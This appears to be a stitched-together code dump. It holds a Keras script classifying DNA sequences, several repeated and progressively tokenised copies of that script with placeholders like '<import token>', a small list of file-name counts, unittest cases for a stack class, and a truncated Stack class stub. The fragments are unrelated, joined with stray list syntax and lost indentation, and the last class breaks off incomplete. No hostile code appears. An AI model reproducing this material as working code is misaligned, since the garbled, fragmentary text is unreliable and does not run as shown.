acc = hist.history['acc']
val_acc = hist.history['val_acc']
# make a figure
fig = plt.figure(figsize=(8,4))
# plot loss
ax1 = fig.add_subplot(121)
ax1.plot(loss,label='train_loss')
ax1.plot(val_loss,label='val_loss')
ax1.set_xlabel('Epochs')
ax1.set_ylabel('Loss')
ax1.set_title('Loss on Training and Validation Data')
ax1.legend()
# plot acc
ax2 = fig.add_subplot(122)
ax2.plot(acc,label='train_acc')
ax2.plot(val_acc,label='val_acc')
ax2.set_xlabel('Epochs')
ax2.set_ylabel('Accuracy')
ax2.set_title('Accuracy on Training and Validation Data')
ax2.legend()
plt.tight_layout()
plt.show()
###neural network model
def nn_model(train_x,train_y,test_x):
model = Sequential()
model.add(Dense(28,input_shape = (train_x.shape[-1],),activation = 'relu'))
model.add(Dropout(0.4))
model.add(Dense(4,activation = 'relu'))
model.add(Dense(2,activation='sigmoid'))
model.summary()
earlystop = EarlyStopping(monitor = 'loss',patience = 3)
model.compile(optimizer = 'adam',loss = 'categorical_crossentropy',metrics = ['accuracy'])
hist = model.fit(train_x,train_y,
# validation_data = (val_x,val_y),
validation_split = 0.1,
batch_size = 8,
callbacks = [earlystop],
epochs = 200)
# visualize the procedure
training_vis(hist)
y_pre = model.predict(test_x)
y_pre = np.argmax(y_pre,1)
# print(y_pre[:3])
return y_pre
def main():
train_dir = "../data/train.csv"
test_dir = "../data/test.csv"
df_train = pd.read_csv(train_dir)
df_test = pd.read_csv(test_dir)
sub = pd.DataFrame()
sub['id'] = df_test['id']
df = pd.concat([df_train.iloc[:,1:-1],df_test.iloc[:,1:]])
y = df_train['label']
trian_row = df_train.shape[0]
print('columns ',df.columns)
print("df head")
print(df.head())
gene_map = {"A":0,"T":1,"C":2,"G":3}
df['sequence'] = df['sequence'].map(list)
df['sequence'] = df['sequence'].map(lambda x : [gene_map[i] for i in x])
for i in range(14):
df['sequence' + str(i)] = list(map(lambda x:x[i],df['sequence']))
del df['sequence']
print("after pre ")
print(df.head())
train = df.iloc[:trian_row:,:]
test = df.iloc[trian_row:,:]
y = to_categorical(y,2)
print('train shape is',train.shape)
print('test shape is',test.shape)
sub["prediction"] = nn_model(train,y,test)
sub['prediction'] = [1 if i > 0.5 else 0 for i in sub['prediction']]
sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sub.to_csv("../result/" + sub_name +".csv",index = None)
print(sub.head())
if __name__ == '__main__':
main() | [
"import pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import KFold,StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Activation,Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils import to_categorical\nfrom keras.metrics import binary_accuracy\nimport keras\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport datetime\n\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n\n # make a figure\n fig = plt.figure(figsize=(8,4))\n # plot loss\n ax1 = fig.add_subplot(121)\n ax1.plot(loss,label='train_loss')\n ax1.plot(val_loss,label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n # plot acc\n ax2 = fig.add_subplot(122)\n ax2.plot(acc,label='train_acc')\n ax2.plot(val_acc,label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n###neural network model\ndef nn_model(train_x,train_y,test_x):\n\tmodel = Sequential()\n\tmodel.add(Dense(28,input_shape = (train_x.shape[-1],),activation = 'relu'))\n\tmodel.add(Dropout(0.4))\n\tmodel.add(Dense(4,activation = 'relu'))\n\tmodel.add(Dense(2,activation='sigmoid'))\n\n\tmodel.summary()\n\tearlystop = EarlyStopping(monitor = 'loss',patience = 3)\n\tmodel.compile(optimizer = 'adam',loss = 'categorical_crossentropy',metrics = ['accuracy'])\n\n\thist = model.fit(train_x,train_y,\n\t\t# validation_data = (val_x,val_y),\n\t\tvalidation_split = 0.1,\n\t\tbatch_size = 8,\n\t\tcallbacks = [earlystop],\n\t\tepochs = 200)\n\t# visualize the procedure\n\ttraining_vis(hist)\n\ty_pre = model.predict(test_x)\n\ty_pre = np.argmax(y_pre,1)\n\t# print(y_pre[:3])\n\treturn y_pre\n\n\ndef main():\n\ttrain_dir = \"../data/train.csv\"\n\ttest_dir = \"../data/test.csv\"\n\tdf_train = pd.read_csv(train_dir)\n\tdf_test = pd.read_csv(test_dir)\n\tsub = pd.DataFrame()\n\tsub['id'] = df_test['id']\n\tdf = pd.concat([df_train.iloc[:,1:-1],df_test.iloc[:,1:]])\n\ty = df_train['label']\n\ttrian_row = df_train.shape[0]\n\tprint('columns ',df.columns)\n\tprint(\"df head\")\n\tprint(df.head())\n\tgene_map = {\"A\":0,\"T\":1,\"C\":2,\"G\":3}\n\tdf['sequence'] = df['sequence'].map(list)\n\tdf['sequence'] = df['sequence'].map(lambda x : [gene_map[i] for i in x])\n\tfor i in range(14):\n\t\tdf['sequence' + str(i)] = list(map(lambda x:x[i],df['sequence']))\n\tdel df['sequence']\n\tprint(\"after pre \")\n\tprint(df.head())\n\ttrain = df.iloc[:trian_row:,:]\n\ttest = df.iloc[trian_row:,:]\n\ty = to_categorical(y,2)\n\tprint('train shape is',train.shape)\n\tprint('test shape is',test.shape)\n\tsub[\"prediction\"] = nn_model(train,y,test)\n\tsub['prediction'] = [1 if i > 0.5 else 0 for i in sub['prediction']]\n\tsub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\tsub.to_csv(\"../result/\" + sub_name +\".csv\",index = None)\n\tprint(sub.head())\n\n\nif __name__ == '__main__':\n\tmain()",
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import KFold, StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils import to_categorical\nfrom keras.metrics import binary_accuracy\nimport keras\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport datetime\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\ndef main():\n train_dir = '../data/train.csv'\n test_dir = '../data/test.csv'\n df_train = pd.read_csv(train_dir)\n df_test = pd.read_csv(test_dir)\n sub = pd.DataFrame()\n sub['id'] = df_test['id']\n df = pd.concat([df_train.iloc[:, 1:-1], df_test.iloc[:, 1:]])\n y = df_train['label']\n trian_row = df_train.shape[0]\n print('columns ', df.columns)\n print('df head')\n print(df.head())\n gene_map = {'A': 0, 'T': 1, 'C': 2, 'G': 3}\n df['sequence'] = df['sequence'].map(list)\n df['sequence'] = df['sequence'].map(lambda x: [gene_map[i] for i in x])\n for i in range(14):\n df['sequence' + str(i)] = list(map(lambda x: x[i], df['sequence']))\n del df['sequence']\n print('after pre ')\n print(df.head())\n train = df.iloc[:trian_row, :]\n test = df.iloc[trian_row:, :]\n y = to_categorical(y, 2)\n print('train shape is', train.shape)\n print('test shape is', test.shape)\n sub['prediction'] = nn_model(train, y, test)\n sub['prediction'] = [(1 if i > 0.5 else 0) for i in sub['prediction']]\n sub_name = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sub.to_csv('../result/' + sub_name + '.csv', index=None)\n print(sub.head())\n\n\n<code token>\n",
"<import token>\n\n\ndef training_vis(hist):\n loss = hist.history['loss']\n val_loss = hist.history['val_loss']\n acc = hist.history['acc']\n val_acc = hist.history['val_acc']\n fig = plt.figure(figsize=(8, 4))\n ax1 = fig.add_subplot(121)\n ax1.plot(loss, label='train_loss')\n ax1.plot(val_loss, label='val_loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.set_title('Loss on Training and Validation Data')\n ax1.legend()\n ax2 = fig.add_subplot(122)\n ax2.plot(acc, label='train_acc')\n ax2.plot(val_acc, label='val_acc')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.set_title('Accuracy on Training and Validation Data')\n ax2.legend()\n plt.tight_layout()\n plt.show()\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n\n\ndef nn_model(train_x, train_y, test_x):\n model = Sequential()\n model.add(Dense(28, input_shape=(train_x.shape[-1],), activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(4, activation='relu'))\n model.add(Dense(2, activation='sigmoid'))\n model.summary()\n earlystop = EarlyStopping(monitor='loss', patience=3)\n model.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\n hist = model.fit(train_x, train_y, validation_split=0.1, batch_size=8,\n callbacks=[earlystop], epochs=200)\n training_vis(hist)\n y_pre = model.predict(test_x)\n y_pre = np.argmax(y_pre, 1)\n return y_pre\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
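
The preprocessing inside main() above expands each 14-character A/T/C/G sequence into 14 ordinal-coded columns. A self-contained version of just that step is sketched below, reusing the same gene_map; the fixed length of 14 is taken from the hard-coded range(14) in the record.

import pandas as pd

GENE_MAP = {'A': 0, 'T': 1, 'C': 2, 'G': 3}  # same mapping as gene_map in main()

def encode_sequences(df: pd.DataFrame, seq_len: int = 14) -> pd.DataFrame:
    # one integer column per base position, mirroring the sequence0..sequence13 columns built in main()
    codes = df['sequence'].map(lambda s: [GENE_MAP[ch] for ch in s])
    for i in range(seq_len):
        df['sequence' + str(i)] = codes.map(lambda x: x[i])
    return df.drop(columns=['sequence'])

# example: encode_sequences(pd.DataFrame({'sequence': ['ATCGATCGATCGAT']}))
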
99,831 | 4755024900f375d46672ee321fa0044e23ef68ac | ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), ('CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)] | [
"ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), ('CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)]",
"ii = [('CoopJBT2.py', 15), ('RoscTTI3.py', 1), ('GodwWLN.py', 1), (\n 'CoopJBT.py', 18), ('RoscTTI.py', 1), ('HogaGMM2.py', 2)]\n",
"<assignment token>\n"
] | false |
99,832 | e11fe5744be6dc24c84a6611b3cf054d58440988 | import unittest
# Use the imports below to test either your array-based stack
# or your link-based version
#from stack_array import Stack
from stack_linked import Stack
class TestLab2(unittest.TestCase):
def test_simple(self):
stack = Stack(5)
stack.push(0)
self.assertFalse(stack.is_empty())
self.assertFalse(stack.is_full())
self.assertEqual(stack.size(),1)
def test_simple_2(self):
        # checks that the pop and is_empty methods are working
stack = Stack(7)
stack.push(3)
self.assertFalse(stack.is_empty())
stack.pop()
self.assertTrue(stack.is_empty())
def test_simple_3(self):
#checks the is_full method for working
stack = Stack(1)
stack.push(4)
        self.assertTrue(stack.is_full())  # call the method; the bare bound method is always truthy
def test_simple_4(self):
#checks the peek method
stack = Stack(0)
with self.assertRaises(IndexError):
stack.peek()
stack = Stack(7)
stack.push(4)
stack.push(3)
self.assertEqual(stack.peek(), 3)
stack.pop()
self.assertEqual(stack.peek(), 4)
def test_simple_5(self):
#testing of the push method
stack = Stack(2)
stack.push(3)
stack.push(2)
with self.assertRaises(IndexError):
stack.push(4)
def test_simple_6(self):
#testing of the pop method
stack = Stack(0)
with self.assertRaises(IndexError):
stack.pop()
def test_simple_7(self):
#testing of none
stack = Stack(None)
with self.assertRaises(IndexError):
stack.push('hello')
def test_simple_8(self):
stack = Stack(0)
        self.assertTrue(stack.is_full())  # call the method so the assertion actually checks fullness
if __name__ == '__main__':
unittest.main()
| [
"import unittest\n\n# Use the imports below to test either your array-based stack\n# or your link-based version\n#from stack_array import Stack\nfrom stack_linked import Stack\n\nclass TestLab2(unittest.TestCase):\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(),1)\n \n def test_simple_2(self):\n #checks that the pop and isEmpty method are working\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n #checks the is_full method for working\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n \n\n def test_simple_4(self):\n #checks the peek method\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n \n def test_simple_5(self):\n #testing of the push method\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n #testing of the pop method\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n \n def test_simple_7(self):\n #testing of none\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n \n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n \n\n \n\n\nif __name__ == '__main__': \n unittest.main()\n",
"import unittest\nfrom stack_linked import Stack\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n\n def test_simple_3(self):\n stack = Stack(1)\n stack.push(4)\n self.assertTrue(stack.is_full)\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n\n def test_simple(self):\n stack = Stack(5)\n stack.push(0)\n self.assertFalse(stack.is_empty())\n self.assertFalse(stack.is_full())\n self.assertEqual(stack.size(), 1)\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n\n def test_simple_7(self):\n stack = Stack(None)\n with self.assertRaises(IndexError):\n stack.push('hello')\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n\n def test_simple_2(self):\n stack = Stack(7)\n stack.push(3)\n self.assertFalse(stack.is_empty())\n stack.pop()\n self.assertTrue(stack.is_empty())\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n\n def test_simple_5(self):\n stack = Stack(2)\n stack.push(3)\n stack.push(2)\n with self.assertRaises(IndexError):\n stack.push(4)\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n\n def test_simple_6(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.pop()\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n <function token>\n <function token>\n\n def test_simple_8(self):\n stack = Stack(0)\n self.assertTrue(stack.is_full)\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n def test_simple_4(self):\n stack = Stack(0)\n with self.assertRaises(IndexError):\n stack.peek()\n stack = Stack(7)\n stack.push(4)\n stack.push(3)\n self.assertEqual(stack.peek(), 3)\n stack.pop()\n self.assertEqual(stack.peek(), 4)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n\n\nclass TestLab2(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
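Note on record 99,832 above: the tests import Stack from a stack_linked module that is not included in this dump. Purely as an illustration of what those tests appear to assume, the sketch below is a minimal linked-node stack that raises IndexError on overflow, underflow and a missing capacity; everything beyond the method names the tests call (the Node helper, the handling of None and zero capacities, the error messages) is an assumption, not the original module.

# Hypothetical reconstruction of the stack_linked.Stack the tests above import;
# the real module is not shown in this dump, so the details here are assumptions.
class Node:
    def __init__(self, value, next_node=None):
        self.value = value
        self.next = next_node


class Stack:
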